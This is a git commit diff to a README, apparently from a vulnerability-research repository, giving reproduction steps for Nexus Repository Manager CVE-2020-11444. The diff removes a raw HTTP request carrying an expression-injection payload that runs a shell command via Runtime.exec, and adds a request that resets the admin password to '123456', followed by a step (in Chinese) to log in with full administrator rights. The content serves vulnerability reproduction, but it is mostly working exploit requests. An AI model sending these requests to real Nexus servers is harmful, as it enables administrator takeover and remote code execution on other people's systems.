fix:nexus-CVE-2020-11444

“threedr3am” · “threedr3am” · commit cd725d12e9af · 2020-04-04T00:01:22.000+08:00
diff --git a/nexus/CVE-2020-11444/README.md b/nexus/CVE-2020-11444/README.md
@@ -38,22 +38,24 @@ idea创建远程debug-启动
 ### 6. 调用更新role接口
 数据包：
 ```
-POST /service/extdirect HTTP/1.1
+PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1
 Host: 127.0.0.1:8081
-Content-Length: 301
+Content-Length: 6
 accept: application/json
 Sec-Fetch-Dest: empty
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
-NX-ANTI-CSRF-TOKEN: 0.16936373694860252
-Content-Type: application/json
+NX-ANTI-CSRF-TOKEN: 0.6080434247960143
+Content-Type: text/plain
 Origin: http://127.0.0.1:8081
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: cors
 Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
 Accept-Encoding: gzip, deflate, br
 Accept-Language: zh-CN,zh;q=0.9
-Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.16936373694860252; NXSESSIONID=4e5437b3-7755-4784-bda6-d004e8f589fb
+Cookie: NX-ANTI-CSRF-TOKEN=0.6080434247960143; NXSESSIONID=af3706e2-dc9e-47fa-9739-edb6b3d512fe
 Connection: close
 
-{"action":"coreui_User","method":"update","data":[{"userId":"www","version":"2","firstName":"www","lastName":"www","email":"www@qq.com","status":"active","roles":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"]}],"type":"rpc","tid":9}
-```
+123456
+```
+
+### 7. 使用admin & 123456登陆，获得最高管理员权限
